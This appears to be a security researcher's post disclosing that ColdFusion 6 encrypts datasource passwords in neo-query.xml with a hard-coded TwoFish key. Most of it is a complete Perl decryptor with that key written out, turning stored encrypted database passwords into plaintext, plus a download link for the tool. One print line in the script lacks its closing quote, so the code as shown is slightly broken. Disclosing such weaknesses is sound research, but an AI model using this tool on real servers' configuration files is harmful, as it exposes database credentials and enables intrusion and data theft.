DataSource passwords in v6 are stored in \lib\neo-query.xml as they were in v7, but this time the passwords are encrypted using a 16-bytes hard-coded key using the TwoFish encryption algorithm.
The code used to encrypt the passwords can be found in cfusion.jar, unzip the .jar file and look for it in \coldfusion\sql\TwoFishCryptor.class and \coldfusion\sql\TwoFish_Algorithm.class.
I wrote a quick perl script to decrypt these passwords (it requires Crypt::TwoFish which you can easily download using CPAN or manually), here it is:
# ColdFusion 6 neo-query.xml database passwords decryptor
# (c) Hernan Ochoa (hernan@gmail.com)
use Crypt::Twofish;
$key = "\x56\xbc\xca\x37\x94\x81\xa6\x17\x09\x59\xfa\xdb\xcc\xfd\x40\x1a";
print "ColdFusion 6 neo-query.xml database passwords decryptor\n";
print "by Hernan Ochoa (hernan\@gmail.com)\n\n";
if (($#ARGV+1) != 1) {
print "syntax: decryptcf6.pl
print "example: decryptcf6.pl AABBCCDDEEFF00010203040506070809\n";
print "\n";
exit 0;
}
$data = @ARGV[0];
if ( length($data) != 32 ) {
print "ERROR: encrypted password must be 32-characters long!\n";
exit 0;
}
print "encrypted password: $data\n";
@chars = split '', $data;
$mybytes = "";
for( $i=0; $i<32; $i=$i+2) {
$mybytes = $mybytes . chr( ( hex(@chars[$i])*16 ) + hex( @chars[$i+1]) );
}
$cipher = Crypt::Twofish->new($key);
print "decrypted password: " . $cipher->decrypt($mybytes);
print "\n";
You can also download it here: http://www.hexale.org/tools/decryptcf6.tgz